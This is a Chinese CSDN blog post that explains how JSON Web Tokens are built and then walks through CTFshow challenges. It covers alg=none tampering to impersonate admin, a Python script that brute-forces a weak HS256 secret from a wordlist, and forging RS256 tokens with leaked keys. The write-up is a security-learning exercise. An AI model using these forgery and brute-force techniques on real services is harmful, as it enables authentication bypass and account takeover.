JWT的认识和攻击方法

最新推荐文章于 2024-04-17 20:47:50 发布
最新推荐文章于 2024-04-17 20:47:50 发布
阅读量586 收藏 3
点赞数 1
分类专栏: Web安全学习篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/119080137
版权

什么是JWT

JWT ( JSON Web Token 的缩写)是一串带有声明信息的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。
Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,JWT可用于身份认证、会话状态维持、信息交换等。
JWT 由三部分构成,分别称为 header 、payload 和 signature ,各部分用. 相连构成一个完整的Token
xxxxxx.yyyyyyy.zzzzzz

在这里插入图片描述

# header :
使用一个JSON格式字符串声明token的类型和签名用的算法等,形如使
{"alg": "None","typ": "jwt“}
该字符串经过Base64Url编码后形成JWT的第一部分xxxxx。

# payload :
该字符串经过Base64Url编码后形成JWT的第二部分 yyyyy。

载荷就是存放有效信息的地方。这个名字像是特指飞机上承载的货品,这些有效信息包含三个部分

标准中注册的声明 (建议但不强制使用) :
iss: jwt签发者
sub: jwt所面向的用户
aud: 接收jwt的一方
exp: jwt的过期时间,这个过期时间必须要大于签发时间
nbf: 定义在什么时间之前,该jwt都是不可用的.
iat: jwt的签发时间
jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击。

公共的声明 :
公共的声明可以添加任何的信息,一般添加用户的相关信息或其他业务需要的必要信息.但不建议添加敏感信息,因为该部分在客户端可解密.

私有的声明 :
私有声明是提供者和消费者所共同定义的声明,一般不建议存放敏感信息,因为base64是对称解密的,意味着该部分信息可以归类为明文信息。

# signature :
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,
然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分 zzzzzzz

数据签名是JWT的核心部分,构成较为复杂
可以选择对称加密算法或者非对称加密算法,常用的就是 HS256、RS256。
HS256加密:(对称加密)
signature = HMACSHA256( base64UrlEncode(header) + "." +base64UrlEncode(payload), secret );
   
RS256加密:(非对称加密)
signature = RSASHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload), publicKey, privateKey)

对JWT有了大致了解后,用CTFshow的几道题来尝试一下

web 345

因为是JWT的题目,所以直接看cookies
在这里插入图片描述
丢到 jwt.io 里去看看
在这里插入图片描述
可以看到这里 alg = none 没有加密 ,sub 是jwt所面向的用户,只需要将sub的值改成admin,然后cookies替换掉就行了

web 346

在这里插入图片描述
可以发现这道题 Hs256 加密了,那就爆破一下

import jwt
import json


def runblasting(path, jwt_str, alg):
    if alg == "none":
        alg = "HS256"
    with open(path, encoding='utf-8') as f:
        for line in f:
            key_ = line.strip()
            print('use ' + key_)
            try:
                jwt.decode(jwt_str, verify=True, key=key_, algorithms=alg)
                print('found key! --> ' + key_)
                break
            except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                   jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError,
                   jwt.exceptions.ImmatureSignatureError):
                print('found key! --> ' + key_)
                break
            except(jwt.exceptions.InvalidSignatureError):
                continue
        else:
            print("key not found!")


if __name__ == '__main__':
    runblasting('bp1.txt',
                'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYyNzE5MDgxOSwiZXhwIjoxNjI3MTk4MDE5LCJuYmYiOjE2MjcxOTA4MTksInN1YiI6InVzZXIiLCJqdGkiOiJjMjQ4Y2NhMTdkNGFkOWM3MzRlYjE4ZDJlZTY1MjBlYiJ9.3RorUDLhutsqgkbphdQ92ICeSDzEDXB2XjWofXR0RZk',
                'HS256')

通过跑字典出 secret = 123456 ,最后替换cookies就行

在这里插入图片描述

web 348

同样还是 Hs256 加密的,继续尝试爆破弱口令,这次是 aaab

web 349

在这里插入图片描述
这道题就是 Rs256 加密的,有公私钥
但题目还算良心,给了公私钥泄露,访问下载就行
在这里插入图片描述
在这里插入图片描述
同样的只要把得到的公私钥丢进去就行了
在这里插入图片描述

安全建议

不应该在jwt的payload部分存放敏感信息,因为该部分是客户端可解密的部分。

保护好secret私钥,该私钥非常重要。

如果可以,请使用https协议
paidx0
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试-JWT攻击
cdyunaq的博客
01-18 6191
1.jwt是什么 Json web token(JWT),是为了在网络应用环境间传递声明而执行的一中基于JSON的开放标准。常用于分布式站点的单点登录。 JWT的声明一般被用在客户端与服务端之间传递身份认证信息,便于向服务端请求资源。 1.1.原理 1)客户端提交用户名密码等信息到服务端请求登录,服务端在验证通过后前发一个具有时效性的token,将token返回给客户端 2)客户端收到token后会将token存储在cookie或localStorage中 3)随后客户端每次请求都会携带这个to
homesense:Node.js 实验
07-03
通过这个"家感:Node.js 实验"项目,你将深入理解Node.js在实际场景中的应用,提升JavaScript编程能力,并对物联网和智能家居有更直观的认识。记得在实践中不断学习和迭代,完善你的项目,使其更具实用性和可扩展性。
JWT 简介
~
02-14 402
Json web token(JWT),是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准,JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源 三部分组成 第一部分:算法、token类别 格式为字典-元数据 ,格式如下,该部分数据需要转成json串并用base64转码 {'alg':'HS256','typ':'JWT'} # alg 代表要使用的算法 # typ 标识该token的类别,此处必须为大写的JWT 第二部分:具体数据 格式为字典
【网络安全 | 密码学】JWT基础知识及攻击方式详析
最新发布
等风来
04-17 996
JWT(Json Web Token)是一种用于在网络应用之间安全地传输信息的开放标准。它通过将用户信息以JSON格式加密并封装在一个token中,然后将该token发送给服务端进行验证,从而实现身份验证和授权。
关于JWT的一些攻击方法
zhangge3663的博客
04-23 1008
前几天做了一个登录页面的绕过,由于认证返回的token是JWT的格式,于是花了一些时间看了看有关于JWT的东西。 #关于JWT JWT的全称为Json Web Token。它遵循JOSN格式,与传统的cookie+session的认证方式不同,服务器使用它的好处是只需要保存秘钥信息,通过加密算法验证token即可,减小了保存用户信息的资源开销。 jwt可以分成三部分,header.payload.signature ## header部分 通常它会长成这个样子 { "alg": ".
JWT原理及常见攻击方式
luffysec的博客
01-12 1062
JWT的全称是Json Web Token。它遵循JSON格式,将用户信息加密到token里,服务器不保存任何用户信息,只保存密钥信息,通过使用特定加密算法验证token,通过token验证用户身份。基于token的身份验证可以替代传统的cookie+session身份验证方法jwt由三个部分组成:header.payload.signature 官网:https://jwt.io/ JWT原理 0x01 JWT认证流程 在项目开发中,一般会按照上图所示的过程进行认证,即:用户登录成功之后,服务端给
细说——JWT攻击
LainWith的博客
01-05 5372
JSON Web Token (JWT) 是一种标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户信息的声明,作为身份验证、会话处理和访问控制机制的一部分。与经典会话令牌不同,服务器需要的所有数据都存储在 JWT 本身的客户端中。这使得 JWT 成为高度分布式网站的热门选择,在这些网站中,用户需要与多个后端服务器无缝交互。它一般会放置在、**Cookie**或者请求体里面。
基于PHP的淘宝内部优惠券广告展示系统php版源码.zip
10-21
标题中的“基于PHP的淘宝内部优惠券广告展示系统php版源码”表明这是一个使用PHP编程语言...通过理解这些关键知识点,我们可以对这个基于PHP的淘宝内部优惠券广告展示系统有一个全面的认识,并能更好地理解和分析源码。
商业编程-源码-在线作业系统源码.zip
06-24
11. **安全性**:源码应遵循OWASP(Open Web Application Security Project)的最佳实践,包括防止SQL注入、XSS攻击和CSRF攻击等,以确保系统的安全性。 12. **可扩展性与维护性**:良好的设计模式(如工厂模式、...
POST登陆10cf
07-21
为了深入理解10cf源码,我们需要对HTTP协议、前端交互、后端处理以及可能涉及的认证机制(如Cookie、Session、JWT等)有充分的认识。此外,学习如何使用开发者工具来调试和分析POST请求也是提升技能的重要步骤。 ...
500道java后端面试必知必会
01-12
18. **安全**: 认识常见的网络安全威胁,如SQL注入、XSS攻击,以及如何使用HTTPS、JWT等技术确保数据安全。 通过系统学习并实践这些知识点,Java后端开发者能够为面试做好充分准备,不仅能够回答问题,还能在实际...
攻击JWT的一些方法
weixin_50464560的博客
10-02 360
关于jwt JWT的全称是Json Web Token。它遵循JSON格式,将用户信息加密到token里,服务器不保存任何用户信息,只保存密钥信息,通过使用特定加密算法验证token,通过token验证用户身份。基于token的身份验证可以替代传统的cookie+session身份验证方法jwt由三个部分组成:header.payload.signature header部分 header部分最常用的两个字段是alg和typ,alg指定了token加密使用的算法(最常用...
【渗透测试】JWT令牌漏洞攻击
网络安全从业者的学习笔记
06-05 866
JSON Web Token(JWT),是一种用户身份凭证,常用作身份验证、会话处理和访问控制机制。若能控制JWT,则有可能造成身份伪造等漏洞攻击
jwt攻击总结
Shanfenglan's blog
12-31 8867
文章目录1. 通过修改header中的alg字段实现攻击2. 通过爆破密钥3. 修改kid实现攻击4. 修改加密算法参考文章 jwt格式举例如下,以点来分割,总共为三部分: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIyMzMzIiwibmFtZSI6Im5wZnMiLCJhZG1pbiI6dHJ1ZX0.mcHAMzOrqyqLk5-tmWVp1-zdlqIVcOdv-39oQIoOWoQ jwt是一种类似于token、session的用户身份凭据。
JWT详解(包含多种针对JWT攻击)
Zyu0
11-24 1351
JSON Web Token(JWT)是一种开放标准(RFC 7519),它定义了一种独立的方式,作为JSON对象在各方之间安全地传输信息。此信息可以被验证,因为它是经过数字签名的。JWT可以使用**HMAC**算法或使用**RSA**的公钥/私钥对进行签名。
JWT攻击中文手册
12-08 2306
JSON Web Token(JWT)对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等 ,可能还有更多!攻击令牌的过程显然取决于您正在测试的JWT配置和实现的情况,但是在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,...
JWT安全漏洞以及常见攻击方式
dzqxwzoe的博客
02-25 1144
JWT即Json WebToken的缩写,顾名思义,是Token的一种。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。仅需要对该Token正确性进行校验即可,这就意味着基于token认证机制的应用,不需要去考虑用户在哪一台服务器登录了,为应用的扩展提供了便利。新技术带来便利的同时也会带来新的安全问题,如果JWT本身安全存在问题,那么整个身份认证机制就会得不到保障。JWT由三部分组成,类似于。
JWT相关知识及Cookie, Session,Token和JWT的区别总结.pdf
05-31
最通俗的关于Cookie, Session,Token和JWT的相关笔记和理解。在终章笔记中主要介绍一下JWT以及总结Cookie到JWT的区别与发展,包括JWT的定义,特点,重要属性,优缺点,作用和使用场景,Cookie到JWT场景,安全等的区别。 上章:主要介绍背景和Cookie 中章:主要介绍一下Session并总结一下Cookie和Session。 下章:主要介绍Token的相关定义及理解。 终章:主要介绍JWT并总结JWT和Token的区别,以及总结Cookie到JWT的区别。 相关博客链接:https://blog.csdn.net/qq_41895003/article/details/130567062

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值